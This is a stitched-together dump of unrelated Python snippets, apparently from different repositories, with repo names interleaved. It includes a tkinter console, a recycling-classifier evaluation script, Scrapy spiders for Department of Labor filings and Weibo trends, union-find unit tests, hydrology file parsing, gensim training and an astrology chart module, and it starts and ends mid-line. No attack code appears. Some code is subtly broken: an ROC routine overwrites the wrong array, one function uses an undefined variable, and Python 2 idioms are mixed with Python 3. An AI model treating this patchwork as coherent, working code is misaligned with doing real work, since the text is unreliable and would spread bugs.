root.config(background="red") main_window = Console(root) main_window.pack(fill=tk.BOTH,expand=True) root.mainloop()0 class Resource(object): def __init__(self, uri, params = None) -> None: self.uri = uri if not params: self.params = dict() else: self.params = paramsimport tensorflow as tf from tensorflow.keras.preprocessing.image import ImageDataGenerator from tensorflow.keras.wrappers.scikit_learn import KerasClassifier from sklearn.metrics import confusion_matrix from sklearn.metrics import auc, roc_curve from pathlib import Path import seaborn as sb import matplotlib.pyplot as plt import numpy as np import pandas as pd import sqlite3 from PIL import Image from scipy import interpolate import matplotlib.image as mplimg from cif3r.data import recycling_guidelines from cif3r.models.predict_model import clf_factory from cif3r.models.train_model import macro_f1, macro_f1_loss from cif3r.features import preprocessing PARENT_DIR = Path(__file__).resolve().parents[2] KAGGLE_DATA_PATH = PARENT_DIR / 'data/raw/DATASET/TEST' MODEL_DIR = PARENT_DIR / 'models' VIZ_DIR= PARENT_DIR / 'reports/figures' DEPS = {'macro_f1_loss': macro_f1_loss, 'macro_f1': macro_f1} def 
prediction_mapping(university: str): try: clf = tf.keras.models.load_model( MODEL_DIR / f"{university}.h5", custom_objects=DEPS ) except OSError: raise Exception( f"Unable to find model. Valid models include {MODEL_DIR.glob('*.h5')}" ) df = preprocessing.datagen(university, balance_classes=False, verify_paths=True) df = df.sample(n=int(len(df) / 10), random_state=42) images = ImageDataGenerator().flow_from_dataframe(df, batch_size=64) y_hat = list(clf.predict(images)) df["y_hat"] = y_hat return {"df": df, "labels": images.class_indices} def plot_confusion_matrix(university: str): """For kaggle data, prediction class is organized by folder structure, but for scraped data, sql metadata is used.""" preds = prediction_mapping(university) df = preds["df"] df["y_hat"] = df["y_hat"].map(lambda x: np.where(x == np.amax(x))[0][0]) df["y_hat"] = df["y_hat"].map(lambda x: list(preds["labels"].keys())[x]) print(df.head()) labels = list(preds['labels'].keys()) con_mat = confusion_matrix(df['class'], df['y_hat'], labels=labels) figure = plt.figure(figsize=(10,8)) con_mat_df = pd.DataFrame(con_mat, index=labels, columns=labels) sb.heatmap(con_mat_df, annot=True, cmap=plt.cm.Blues) plt.tight_layout() plt.xlabel("True label") plt.ylabel("Predicted label") plt.savefig(VIZ_DIR / f"{university}_confusion_matrix.png") def plot_roc(university:str): """Creates ROC curve from average ROC value for each class""" preds = prediction_mapping(university) df = preds["df"] df["y_hat"] = df["y_hat"].map(lambda x: np.where(x == np.amax(x))[0][0]) df["y_test"] = df["class"].map(lambda x: preds['labels'][x]) labels = list(preds['labels'].values()) fpr = dict() tpr = dict() roc_auc = dict() for label in labels: y_hat = np.zeros(len(preds['df'])) y_test = np.zeros(len(preds['df'])) for i, (true, pred) in enumerate(df[['y_test', 'y_hat']].itertuples(index=False)): if true == label: y_test[i] = 1 if pred == label: y_test[i] = 1 print(y_hat, y_test) fpr[label], tpr[label], _ = roc_curve(y_test, y_hat) roc_auc[label] = auc(fpr[label], tpr[label]) print(roc_auc) plt.figure() plt.plot([0, 1], [0, 1], 'k--') plt.plot( fpr[label], tpr[label], label=f'ROC score for {i}: {roc_auc[label]}' ) plt.xlabel('False positive rate') plt.ylabel('True positive rate') plt.title('ROC curve') plt.legend(loc='best') plt.savefig(VIZ_DIR / f"{university}_roc.png") def plot_image_predictions(university:str): fig, axes = plt.subplots(nrows=2, ncols=2, figsize=(20,5)) for i, img, ax in zip(range(4), imgs.values(), axes): img_array = mplimg.imread(img) classes = [key for key in imgs.keys()] y_hat = clf_factory(university, img_array, classes) plt.imshow(img_array) ax.set_title(f'Predicted Class: {y_hat}.\n Actual Class {classes[i]}') plt.savefig('/home/dal/CIf3R/reports/img_predictions.png') def make_visualizations(): for university in recycling_guidelines.UNIVERSITIES.keys(): plot_roc(university) if __name__ == "__main__": make_visualizations() from collections import deque def cin(): return list(map(int, input().split())) n, q = cin() graph = [[] for _ in range(n + 1)] for i in range(n - 1): a, b = cin() graph[a].append(b) graph[b].append(a) query = [cin() for _ in range(q)] dist = [-1 for _ in range(n + 1)] dist[0] = 0 dist[1] = 0 d = deque() d.append(1) while d: v = d.popleft() for i in graph[v]: if dist[i] != -1: continue dist[i] = dist[v] + 1 d.append(i) for i in range(q): distance = dist[query[i][0]] + dist[query[i][1]] if distance % 2 == 0: print('Town') else: print('Road') from scrapy import Spider from scrapy.http import FormRequest class 
Employers(Spider): name = "employers" custom_settings = { 'ITEM_PIPELINES': { 'lm20.pipelines.Nullify': 1, 'lm20.pipelines.TitleCase': 2, 'lm20.pipelines.StandardDate': 3, } } def start_requests(self): return [ FormRequest("https://olmsapps.dol.gov/olpdr/GetLM2021FilerListServlet", formdata={'clearCache': 'F', 'page': '1'}, cb_kwargs={'page': 1}, callback=self.parse) ] def parse(self, response, page): """ @url https://olmsapps.dol.gov/olpdr/GetLM2021FilerListServlet @filers_form @cb_kwargs {"page": 0} @returns requests 501 501 """ filers = response.json()['filerList'] for filer in filers: yield FormRequest("https://olmsapps.dol.gov/olpdr/GetLM2021FilerDetailServlet", formdata={'srNum': 'C-' + str(filer['srNum'])}, callback=self.parse_filings) if len(filers) == 500: page += 1 yield FormRequest("https://olmsapps.dol.gov/olpdr/GetLM2021FilerListServlet", formdata={'clearCache': 'F', 'page': str(page)}, cb_kwargs={'page': page}, callback=self.parse) def parse_filings(self, response): """ @url https://olmsapps.dol.gov/olpdr/GetLM2021FilerDetailServlet @filings_form @returns request 1 """ for filing in response.json()['detail']: yield FormRequest('https://olmsapps.dol.gov/olpdr/GetAdditionalEmpsServlet', formdata={'rptId': str(filing['rptId'])}, callback=self.parse_employer) def parse_employer(self, response): """ @url https://olmsapps.dol.gov/olpdr/GetAdditionalEmpsServlet @employers_form @returns items 1 """ employer_fields = ('rptId', 'empLabOrg', 'empTrdName', 'city', 'state', 'termDate', 'amount') for employer in response.json()['detail']: item = {field: employer[field] for field in employer_fields} yield item linzhlalala/self-critical.pytorch import json # retina_file_name = 'data/retinatinytalk.json' retina_file_name = 'data/retina_tiny_eval.json' with open(retina_file_name) as retina_json_file: retina_dataset = json.load(retina_json_file) print(retina_dataset.keys())godoggyo/AutoWordle import fileinput as fi from queue import Empty import random ### Word list arrays TODO: Add weights for auto solvers ### ### Maybe make am ore complex list using native unix dic ### word_list = [] MISS = "X" CONTAINS = "-" CORRECT = "#" def establishWordPool(): if word_list is not Empty: f = fi.input(files="files/dict.txt") for line in f: line = line.strip("\n") word_list.append(line) f.close() def selectWord(): return random.choice(word_list) ### Print functions for game turns ### def gameStart(): print("You have 5 tries left:") print(MISS + " " + MISS + " " + MISS + " " + MISS + " " + MISS) def userInput(): guess = input("Enter Guess: ") return guess def letterCheck(letterList, word): for i in range(len(letterList)): if letterList[i] == word[i]: print(CORRECT) else: print(MISS)100-1000 # Copyright (c) Microsoft Corporation. # Licensed under the MIT license. from typing import List from maro.backends.frame import NodeAttribute, NodeBase, node @node("regions") class Region(NodeBase): """Region node definition in frame.""" id = NodeAttribute("i2") total_machine_num = NodeAttribute("i") empty_machine_num = NodeAttribute("i") def __init__(self): self._id: int = 0 self._total_machine_num: int = 0 self._name: str = "" self._zone_list: List[int] = [] def set_init_state(self, id: int, total_machine_num: int): """Set initialize state, that will be used after frame reset. Args: id (int): Region id. 
""" self._id = id self._total_machine_num = total_machine_num self.reset() def reset(self): """Reset to default value.""" self.id = self._id self.total_machine_num = self._total_machine_num self.empty_machine_num = self.total_machine_num @property def zone_list(self) -> List[int]: return self._zone_list @zone_list.setter def zone_list(self, zone_list: List[int]): self._zone_list = zone_list @property def name(self) -> str: return self._name @name.setter def name(self, name: str): self._name = name tests/test_main.py0 from proto.main import ProtoTest def test_proto(tmp): with ProtoTest() as app: res = app.run() print(res) raise Exception def test_command1(tmp): argv = ['command1'] with ProtoTest(argv=argv) as app: app.run() 1-10 # Extract output.rch similar to observed_rch.txt struction in nsga2.in folder import sys, datetime, os import codecs # ----------------- Class ------------------ class SWAT: def __init__(self, SWATtxtinoutFolderDirectory): self.__dir = SWATtxtinoutFolderDirectory # Read file. cio to get begining date and end date SWAT = codecs.open(os.path.join(SWATtxtinoutFolderDirectory, "file.cio"), "r", encoding="utf-8") lines = SWAT.readlines() skipyear = int(lines[59][12:16]) FCbeginyear = int(lines[8][12:16]) + skipyear # begining year FCendyear = FCbeginyear + int(lines[7][12:16]) - 1 - int(lines[59][12:16]) # ending year if skipyear == 0: FCbeginday = int(lines[9][12:16]) # begining julian day else: FCbeginday = 1 # begining julian day FCendday = int(lines[10][12:16]) # ending julian day SWAT.close() FCbegindate = datetime.datetime(FCbeginyear, 1, 1) + datetime.timedelta(FCbeginday - 1) FCenddate = datetime.datetime(FCendyear, 1, 1) + datetime.timedelta(FCendday - 1) self.__fcbegindate = FCbegindate self.__fcenddate = FCenddate def DefineTimePeriod(self, BeginDate, EndDate): """Date Format: "m/d/yyyy" """ self.__begindate = (datetime.datetime.strptime(BeginDate, "%m/%d/%Y")) self.__enddate = (datetime.datetime.strptime(EndDate, "%m/%d/%Y")) def ReadDailySWATrchfile(self, OutletSubbasinNumber, columnNumber): """ saves the rch file column and corresponding date columnNumber=0 for area and 1 for the next and so on""" SWAT_Directory = self.__dir # Get file.cio dates FCbegindate = self.__fcbegindate FCenddate = self.__fcenddate # Get defined dates BD = self.__begindate ED = self.__enddate # Check if the date range of the SWAT run covers the defined date range if FCbegindate > BD: sys.exit("Error: The begin date in observed_rch.txt is earlier than SWAT run time span.") if FCenddate < ED: sys.exit("Error: The end date in observed_rch.txt is later than SWAT run time span.") # Read output.rch to get outflow SWAT = codecs.open(os.path.join(SWAT_Directory, "output.rch"), "r", encoding='utf-8') SWATlines = SWAT.readlines() Date_Value = {} date = FCbegindate for line in range(9, len(SWATlines)): if float(SWATlines[line][6:11:]) == OutletSubbasinNumber: # get the values for outlet subbasin outflow = float(SWATlines[line][(columnNumber * 12 + 26):(columnNumber * 12 + 26 + 12):]) Date_Value[date] = outflow date = date + datetime.timedelta(days=1) SWAT.close() # Get the values between defined date thedate = BD ddate = []; dailystreamflow = [] while thedate != ED + datetime.timedelta(days=1): ddate += [thedate] dailystreamflow += [Date_Value[thedate]] thedate = thedate + datetime.timedelta(days=1) # Get array values for daily streamflow self.get_DailyDate = ddate self.get_DailyStreamflow = dailystreamflow # Convert dictionary (Date_value) to array (date and value)---used up in the class def 
DictionaryofDate_valuetoArrays(Date_value): """Returns (array): date, value """ date = Date_value.keys() date.sort() value = [] for d in date: value.append(Date_value[d]) return date, value # Read 'observed_rch.txt' f = codecs.open(os.path.join(os.getcwd(), "NSGA2.IN", "observed_rch.txt"), "r", encoding='utf-8') lines = f.readlines() # Read Observed Streamflow Outlet_Obsorder = {}; outlet = -99; nofdatapoint = -99; begindate = -99; enddate = -99; ColumnNo = -99 for i in range(0, len(lines)): try: if lines[i][0:10:] == 'output_rch': outlet = int(lines[i][11:16].split(" ")[0]) nofdatapoint = int(lines[i + 1].split(" ")[0]) begindate = lines[i + 2].split(" ")[0].split("|")[0] enddate = lines[i + 2].split(" ")[0].split("|")[1] ColumnNo = int(lines[i + 2].split(" ")[0].split("|")[2]) Obsorder = [] for j in range((i + 3), (i + 3 + nofdatapoint)): Obsorder.append(float(lines[j].split("\t")[0])) Outlet_Obsorder[outlet] = Obsorder except: sys.exit("ERROR: check the 'observed_rch.txt' file (the gage on line:" + str(i) + ")") outlets = Outlet_Obsorder.keys() outlets.sort() mlines = "" for outlet in outlets: # Read output.rch sw = SWAT("./") sw.DefineTimePeriod(begindate, enddate) sw.ReadDailySWATrchfile(outlet, ColumnNo) # (OutletSubbasinNumber,columnNumber) simstrflw = sw.get_DailyStreamflow # Get model.out lines for i1 in Outlet_Obsorder[outlet]: i = int(i1) - 1 mlines += str(i + 1) + " " + str(simstrflw[i]) + "\n" # Print the model.out file f = codecs.open(os.path.join(os.getcwd(), "model.out"), "w") f.writelines(mlines) f.close() print("Extraction is done for outlets: ", outlets) # -*- coding: utf-8 -*- import json import re import time from random import choice from urllib.parse import urlencode import scrapy from Hotspot.items import WeiboItem from Hotspot.static import Source from utils.spider_headers import USER_AGENT_LIST from utils.tools import get_md5 class WeiBoHotspotSpider(scrapy.Spider): name = 'weibo' url = 'https://s.weibo.com/top/summary' base_url = 'https://s.weibo.com' def start_requests(self): url = 'https://passport.weibo.com/visitor/genvisitor' data = { 'cb': 'gen_callback' } yield scrapy.FormRequest(url=url, formdata=data, method='post', callback=self.get_sub_data) def get_sub_data(self, response): url = 'https://passport.weibo.com/visitor/visitor?' 
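# DictionaryofDate_valuetoArrays above (and the later Outlet_Obsorder.keys()
# handling) calls .sort() directly on dict.keys(), which only works on
# Python 2, where keys() returns a list. A Python 3-safe sketch of the same
# date -> value flattening, assuming the dict maps datetime objects to floats:
def dict_of_date_value_to_arrays(date_value):
    """Return (dates, values) sorted chronologically."""
    dates = sorted(date_value)                 # sorted() copies the keys into a list
    values = [date_value[d] for d in dates]
    return dates, values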
params = { 'a': 'incarnate', 't': self.get_tid_str(response.text), 'w': 3, 'c': 100, 'cb': 'cross_domain', 'from': 'weibo', } url = url + urlencode(params) yield scrapy.Request(url=url, callback=self.get_weibo_top_summary) def get_weibo_top_summary(self, response): sub_dict = self.get_sub_dict(response.text) sub = sub_dict.get('sub') subp = sub_dict.get('subp') headers = { 'User-Agent': choice(USER_AGENT_LIST), 'Cookie': f"SUB={sub}; SUBP={subp}" } yield scrapy.Request(url=self.url, headers=headers, callback=self.parse) def parse(self, response): node_list = response.xpath(".//div[@class='data']//tr[position()>1]") for node in node_list: value_str = node.xpath(".//td[@class='td-02']/span/text()").extract_first().strip() if not value_str: continue item = WeiboItem() item['title'] = node.xpath(".//td[@class='td-02']/a/text()").extract_first().strip() item['value'] = re.findall(r"\d+", value_str)[0] item['timestamp'] = int(time.time() * 1000) item['title_md5'] = get_md5(item['title']) item['source'] = Source.WEIBO.value link_href_to = node.xpath(".//td[@class='td-02']/a/@href_to").extract_first() if link_href_to: item['link'] = self.base_url + link_href_to.strip() else: item['link'] = self.base_url + node.xpath(".//td[@class='td-02']/a/@href").extract_first().strip() yield item def get_tid_str(self, str_data): results = re.findall(r'gen_callback\((.+?)\);', str_data) if results: json_data = results[0] data_dict = json.loads(json_data) return data_dict['data']['tid'] return None def get_sub_dict(self, str_data): results = re.findall(r'cross_domain\((.+?)\);', str_data) if results: json_data = results[0] data_dict = json.loads(json_data) return data_dict['data'] return {} Code-by-practice/python-syntax-reference # Open terminal > python3 classEg6.py # Start typing below commands and see the output class A: name = 'A' def getName(self): return self.name class B(A): name = 'B' # Override class A's name def getName(self): return self.name b = B() print(b.getName()) from unittest.mock import patch import pytest from webmention.models import WebMentionResponse @pytest.fixture def test_response_body(): return "foo" @pytest.mark.django_db def test_str(test_source, test_target, test_response_body): webmention = WebMentionResponse.objects.create( source=test_source, response_to=test_target, response_body=test_response_body ) webmention.save() assert str(webmention) == webmention.source @pytest.mark.django_db def test_source_for_admin(test_source, test_target, test_response_body): webmention = WebMentionResponse.objects.create( source=test_source, response_to=test_target, response_body=test_response_body ) webmention.save() assert webmention.source_for_admin() == '{href}'.format(href=webmention.source) @pytest.mark.django_db def test_response_to_for_admin(test_source, test_target, test_response_body): webmention = WebMentionResponse.objects.create( source=test_source, response_to=test_target, response_body=test_response_body ) webmention.save() assert webmention.response_to_for_admin() == '{href}'.format(href=webmention.response_to) @patch("webmention.models.WebMentionResponse.save") def test_invalidate_when_not_previously_saved(mock_save): webmention = WebMentionResponse() webmention.invalidate() assert not mock_save.called @pytest.mark.django_db def test_invalidate_when_previously_saved(test_source, test_target, test_response_body): webmention = WebMentionResponse.objects.create( source=test_source, response_to=test_target, response_body=test_response_body ) webmention.save() webmention.invalidate() 
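# get_tid_str and get_sub_dict in the weibo spider above both unwrap a
# JSONP-style payload of the form callback_name({...}); with a regex followed
# by json.loads. A small generic sketch of that unwrapping; the callback name
# and the sample payload below are illustrative only:
import json
import re


def unwrap_jsonp(text, callback_name):
    """Return the decoded JSON object wrapped in callback_name(...), or None."""
    match = re.search(r"%s\((.+?)\);" % re.escape(callback_name), text)
    if not match:
        return None
    return json.loads(match.group(1))


if __name__ == "__main__":
    sample = 'gen_callback({"retcode": 20000000, "data": {"tid": "abc"}});'
    print(unwrap_jsonp(sample, "gen_callback"))  # {'retcode': 20000000, 'data': {'tid': 'abc'}}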
assert not webmention.current @patch("webmention.models.WebMentionResponse.save") def test_update_when_previously_invalid(mock_save, test_source, test_target, test_response_body): webmention = WebMentionResponse.objects.create(source="foo", response_to="bar", response_body="baz", current=False) assert mock_save.call_count == 1 webmention.update(test_source, test_target, test_response_body) assert webmention.current assert webmention.source == test_source assert webmention.response_to == test_target assert webmention.response_body == test_response_body assert mock_save.call_count == 2 import os import glob def _single_glob(pattern): """Returns the file matching a given pattern. An error is raised if no file/multiple files match the pattern Parameters ---------- pattern : str The pattern to match. Returns ------- output : str or None The filename if existant. """ filenames = glob.glob(pattern) if not filenames: raise ValueError('Non exitant file with pattern {}'.format(pattern)) if len(filenames) > 1: raise ValueError('Non unique file with pattern {}'.format(pattern)) return filenames[0] def load_heroes_dataset( subjects=None, subjects_parent_directory='/volatile/asl_data/heroes/raw', dataset_pattern={'anat': 't1mri/acquisition1/anat*.nii', 'basal ASL': 'fMRI/acquisition1/basal_rawASL*.nii', 'basal CBF': 'B1map/acquisition1/basal_relCBF*.nii'} ): """Loads the NeuroSpin HEROES dataset. Parameters ---------- subjects : sequence of int or None, optional ids of subjects to load, default to loading all subjects. subjects_parent_directory : str, optional Path to the dataset folder containing all subjects folders. dataset_pattern : dict, optional Input dictionary. Keys are the names of the images to load, values are strings specifying the unique relative pattern specifying the path to these images within each subject directory. Returns ------- dataset : dict The absolute paths to the images for all subjects. Keys are the same as the files_patterns keys, values are lists of strings. 
""" # Absolute paths of subjects folders subjects_directories = [os.path.join(subjects_parent_directory, name) for name in sorted(os.listdir(subjects_parent_directory)) if os.path.isdir(os.path.join( subjects_parent_directory, name))] max_subjects = len(subjects_directories) if subjects is None: subjects = range(max_subjects) else: if max(subjects) > max_subjects: raise ValueError('Got {0} subjects, you provided ids {1}' ''.format(max_subjects, str(subjects))) subjects_directories = [subjects_directories[subject_id] for subject_id in subjects] # Build the path list for each image type dataset = {} for (image_type, file_pattern) in dataset_pattern.iteritems(): dataset[image_type] = [] for subject_dir in subjects_directories: dataset[image_type].append( _single_glob(os.path.join(subject_dir, file_pattern))) return dataset 0 import unittest from congeries.src import QuickFindUF from congeries.src import QuickUnionUF from congeries.src import WeightedQuickUnionUF from congeries.src import WeightedQuickUnionPathCompressionUF class TestQuickFind(unittest.TestCase): def test_type(self): uf = QuickFindUF(10) self.assertIsInstance(uf, QuickFindUF) def test_array_init(self): uf = QuickFindUF(10) self.assertEqual(uf.id, list(range(10))) def test_union(self): uf = QuickFindUF(10) union_seq = [(4, 3), (3, 8), (6, 5), (9, 4), (2, 1), (8, 9), (5, 0), (7, 2), (6, 1), (1, 0), (6, 7)] expected_ids = [ [0, 1, 2, 3, 3, 5, 6, 7, 8, 9], [0, 1, 2, 8, 8, 5, 6, 7, 8, 9], [0, 1, 2, 8, 8, 5, 5, 7, 8, 9], [0, 1, 2, 8, 8, 5, 5, 7, 8, 8], [0, 1, 1, 8, 8, 5, 5, 7, 8, 8], [0, 1, 1, 8, 8, 5, 5, 7, 8, 8], [0, 1, 1, 8, 8, 0, 0, 7, 8, 8], [0, 1, 1, 8, 8, 0, 0, 1, 8, 8], [1, 1, 1, 8, 8, 1, 1, 1, 8, 8], [1, 1, 1, 8, 8, 1, 1, 1, 8, 8], [1, 1, 1, 8, 8, 1, 1, 1, 8, 8], ] for (p, q), expected in zip(union_seq, expected_ids): uf.union(p, q) self.assertEqual(uf.id, expected) def test_components_count_10(self): uf = QuickFindUF(10) self.assertEqual(uf.components_count, 10) def test_components_count_7(self): """ [0, 1, 2, 8, 8, 5, 5, 7, 8, 9] """ uf = QuickFindUF(10) union_seq = [(4, 3), (3, 8), (6, 5)] for p, q in union_seq: uf.union(p, q) self.assertEqual(uf.components_count, 7) def test_components_count_5(self): """ [0, 1, 1, 8, 8, 5, 5, 7, 8, 8] """ uf = QuickFindUF(10) union_seq = [(4, 3), (3, 8), (6, 5), (9, 4), (2, 1)] for p, q in union_seq: uf.union(p, q) self.assertEqual(uf.components_count, 5) def test_components_count_also_5(self): """ [0, 1, 1, 8, 8, 5, 5, 7, 8, 8] """ uf = QuickFindUF(10) union_seq = [(4, 3), (3, 8), (6, 5), (9, 4), (2, 1), (8, 9)] for p, q in union_seq: uf.union(p, q) self.assertEqual(uf.components_count, 5) def test_components_count_2(self): """ [1, 1, 1, 8, 8, 1, 1, 1, 8, 8] """ uf = QuickFindUF(10) union_seq = [(4, 3), (3, 8), (6, 5), (9, 4), (2, 1), (8, 9), (5, 0), (7, 2), (6, 1), (1, 0), (6, 7)] for p, q in union_seq: uf.union(p, q) self.assertEqual(uf.components_count, 2) class TestQuickUnion(unittest.TestCase): def test_type(self): uf = QuickUnionUF(10) self.assertIsInstance(uf, QuickUnionUF) def test_components_count_10(self): uf = QuickUnionUF(10) self.assertEqual(uf.components_count, 10) def test_union(self): uf = QuickUnionUF(10) union_seq = [(4, 3), (3, 8), (6, 5), (9, 4), (2, 1), (8, 9), (5, 0), (7, 2), (6, 1), (1, 0), (6, 7)] expected_ids = [ [0, 1, 2, 3, 3, 5, 6, 7, 8, 9], [0, 1, 2, 8, 3, 5, 6, 7, 8, 9], [0, 1, 2, 8, 3, 5, 5, 7, 8, 9], [0, 1, 2, 8, 3, 5, 5, 7, 8, 8], [0, 1, 1, 8, 3, 5, 5, 7, 8, 8], [0, 1, 1, 8, 3, 5, 5, 7, 8, 8], [0, 1, 1, 8, 3, 0, 5, 7, 8, 8], [0, 1, 1, 8, 3, 0, 5, 1, 8, 
8], [1, 1, 1, 8, 3, 0, 5, 1, 8, 8], [1, 1, 1, 8, 3, 0, 5, 1, 8, 8], [1, 1, 1, 8, 3, 0, 5, 1, 8, 8], ] for (p, q), expected in zip(union_seq, expected_ids): uf.union(p, q) self.assertEqual(uf.id, expected) def test_components_count_7(self): uf = QuickUnionUF(10) union_seq = [(4, 3), (3, 8), (6, 5)] for p, q in union_seq: uf.union(p, q) self.assertEqual(uf.components_count, 7) def test_components_count_5(self): uf = QuickUnionUF(10) union_seq = [(4, 3), (3, 8), (6, 5), (9, 4), (2, 1)] for p, q in union_seq: uf.union(p, q) self.assertEqual(uf.components_count, 5) def test_components_count_also_5(self): uf = QuickUnionUF(10) union_seq = [(4, 3), (3, 8), (6, 5), (9, 4), (2, 1), (8, 9)] for p, q in union_seq: uf.union(p, q) self.assertEqual(uf.components_count, 5) def test_components_count_2(self): uf = QuickUnionUF(10) union_seq = [(4, 3), (3, 8), (6, 5), (9, 4), (2, 1), (8, 9), (5, 0), (7, 2), (6, 1), (1, 0), (6, 7)] for p, q in union_seq: uf.union(p, q) self.assertEqual(uf.components_count, 2) class TestWeightedQuickUnion(unittest.TestCase): def test_type(self): uf = WeightedQuickUnionUF(10) self.assertIsInstance(uf, QuickUnionUF) def test_components_count_10(self): uf = WeightedQuickUnionUF(10) self.assertEqual(uf.components_count, 10) def test_union(self): uf = WeightedQuickUnionUF(10) union_seq = [(4, 3), (3, 8), (6, 5), (9, 4), (2, 1), (8, 9), (5, 0), (7, 2), (6, 1), (1, 0), (6, 7)] expected_ids = [ [0, 1, 2, 4, 4, 5, 6, 7, 8, 9], [0, 1, 2, 4, 4, 5, 6, 7, 4, 9], [0, 1, 2, 4, 4, 6, 6, 7, 4, 9], [0, 1, 2, 4, 4, 6, 6, 7, 4, 4], [0, 2, 2, 4, 4, 6, 6, 7, 4, 4], [0, 2, 2, 4, 4, 6, 6, 7, 4, 4], [6, 2, 2, 4, 4, 6, 6, 7, 4, 4], [6, 2, 2, 4, 4, 6, 6, 2, 4, 4], [6, 2, 6, 4, 4, 6, 6, 2, 4, 4], [6, 2, 6, 4, 4, 6, 6, 2, 4, 4], [6, 2, 6, 4, 4, 6, 6, 2, 4, 4], ] for (p, q), expected in zip(union_seq, expected_ids): uf.union(p, q) self.assertEqual(uf.id, expected) def test_components_count_7(self): uf = WeightedQuickUnionUF(10) union_seq = [(4, 3), (3, 8), (6, 5)] for p, q in union_seq: uf.union(p, q) self.assertEqual(uf.components_count, 7) def test_components_count_5(self): uf = WeightedQuickUnionUF(10) union_seq = [(4, 3), (3, 8), (6, 5), (9, 4), (2, 1)] for p, q in union_seq: uf.union(p, q) self.assertEqual(uf.components_count, 5) def test_components_count_also_5(self): uf = WeightedQuickUnionUF(10) union_seq = [(4, 3), (3, 8), (6, 5), (9, 4), (2, 1), (8, 9)] for p, q in union_seq: uf.union(p, q) self.assertEqual(uf.components_count, 5) def test_components_count_2(self): uf = WeightedQuickUnionUF(10) union_seq = [(4, 3), (3, 8), (6, 5), (9, 4), (2, 1), (8, 9), (5, 0), (7, 2), (6, 1), (1, 0), (6, 7)] for p, q in union_seq: uf.union(p, q) self.assertEqual(uf.components_count, 2) class TestWeightedQuickUnionPathCompression(unittest.TestCase): def test_type(self): uf = WeightedQuickUnionPathCompressionUF(10) self.assertIsInstance(uf, QuickUnionUF) def test_components_count_10(self): uf = WeightedQuickUnionPathCompressionUF(10) self.assertEqual(uf.components_count, 10) def test_union(self): uf = WeightedQuickUnionPathCompressionUF(10) union_seq = [(4, 3), (3, 8), (6, 5), (9, 4), (2, 1), (8, 9), (5, 0), (7, 2), (6, 1), (1, 0), (6, 7)] expected_ids = [ [0, 1, 2, 4, 4, 5, 6, 7, 8, 9], [0, 1, 2, 4, 4, 5, 6, 7, 4, 9], [0, 1, 2, 4, 4, 6, 6, 7, 4, 9], [0, 1, 2, 4, 4, 6, 6, 7, 4, 4], [0, 2, 2, 4, 4, 6, 6, 7, 4, 4], [0, 2, 2, 4, 4, 6, 6, 7, 4, 4], [6, 2, 2, 4, 4, 6, 6, 7, 4, 4], [6, 2, 2, 4, 4, 6, 6, 2, 4, 4], [6, 2, 6, 4, 4, 6, 6, 2, 4, 4], [6, 6, 6, 4, 4, 6, 6, 2, 4, 4], [6, 6, 6, 4, 4, 6, 6, 6, 4, 4], ] for (p, 
q), expected in zip(union_seq, expected_ids): uf.union(p, q) self.assertEqual(uf.id, expected) def test_components_count_7(self): uf = WeightedQuickUnionPathCompressionUF(10) union_seq = [(4, 3), (3, 8), (6, 5)] for p, q in union_seq: uf.union(p, q) self.assertEqual(uf.components_count, 7) def test_components_count_5(self): uf = WeightedQuickUnionPathCompressionUF(10) union_seq = [(4, 3), (3, 8), (6, 5), (9, 4), (2, 1)] for p, q in union_seq: uf.union(p, q) self.assertEqual(uf.components_count, 5) def test_components_count_also_5(self): uf = WeightedQuickUnionPathCompressionUF(10) union_seq = [(4, 3), (3, 8), (6, 5), (9, 4), (2, 1), (8, 9)] for p, q in union_seq: uf.union(p, q) self.assertEqual(uf.components_count, 5) def test_components_count_2(self): uf = WeightedQuickUnionPathCompressionUF(10) union_seq = [(4, 3), (3, 8), (6, 5), (9, 4), (2, 1), (8, 9), (5, 0), (7, 2), (6, 1), (1, 0), (6, 7)] for p, q in union_seq: uf.union(p, q) self.assertEqual(uf.components_count, 2) if __name__ == '__main__': unittest.main() baileythegreen/conTEXT-explorer import gensim from gensim.models.phrases import Phrases, Phraser import pandas as pd from gensim.test.utils import datapath from gensim.models import Word2Vec import sys def train_model(corpus_name): processed_file_name = "./topic_model/"+corpus_name+"/processed_content_" + corpus_name + '.pkl' sentences=pd.read_pickle(processed_file_name).body.values.tolist()[0] phrases = Phrases(sentences, min_count=10, progress_per=10000) bigram = Phraser(phrases) sentences = bigram[sentences] model = gensim.models.Word2Vec( sentences, size=200, # the size of the dense vector to represent each token window=50, # +/- "window" number of words are counted as neighbors min_count=1, # minimium frequency count of words workers=10, # the number of threads to use behind the scenes iter=20 # number of iterations over the corpus ) model.save("./topic_model/"+corpus_name+"/"+corpus_name+".model") return True def find_similar(corpus_name, term_list,top_n=50): model = Word2Vec.load("./topic_model/"+corpus_name+"/"+corpus_name+".model") top_term_list=[] for term in term_list: if len(term.split())>1:#a phrase term_list.append("_".join(term.split())) term_list.remove(term) # print(term_list) for i in model.wv.most_similar(positive=term_list, topn=top_n): top_term_list.append(i) # print(top_term_list) return top_term_list # -*- coding: utf-8 -*- from gui.mainnb import MainPanel from zodiac import Zodiac from drawing.roundedcharts import * from drawing.aspects import SimpleAspectManager import database import config import chart from gui.mainnb import Slot boss = None import pickle from directions import solar_rev, sec_prog suffixes = { 'draw_nat':'rx','draw_nod':'nd','draw_house':'hs','draw_local':'lc', 'draw_soul':'ca','draw_prof':'pf','draw_int':'in','draw_single':'sn','draw_radsoul':'rsi','draw_dharma':'dh', 'draw_planetogram':'pg', 'click_hh':'hh','click_nn':'nn','click_hn':'hn','click_nh':'nh','click_ss':'ss', 'click_sn':'sn','click_rs':'rsc','sec_prog':'sp','solar_rev':'sr', 'click_rr':'rc','draw_transits':'tr','dat_nat':'dr','dat_house':'dh', 'dat_node:':'dn','prog_nat':'pr','prog_nod':'pn','prog_local':'pl','prog_soul':'ps', 'bio_nat':'br','bio_nod':'bn','bio_soul':'bs','dyn_cuad':'d1','dyn_stars':'ds', 'subject_click':'cs', 'dyn_cuad2':'d2', 'click_bridge':'br', 'compo_one':'c1','compo_two':'c2','ascent_star':'as','polar_star':'ps', 'wundersensi_star':'ws','crown_comp':'cr','paarwabe_plot':'pw', 'click_counterpanel': 'ch', 'comp_pe': 'pe', 'draw_ur_nodal': 'un' } class 
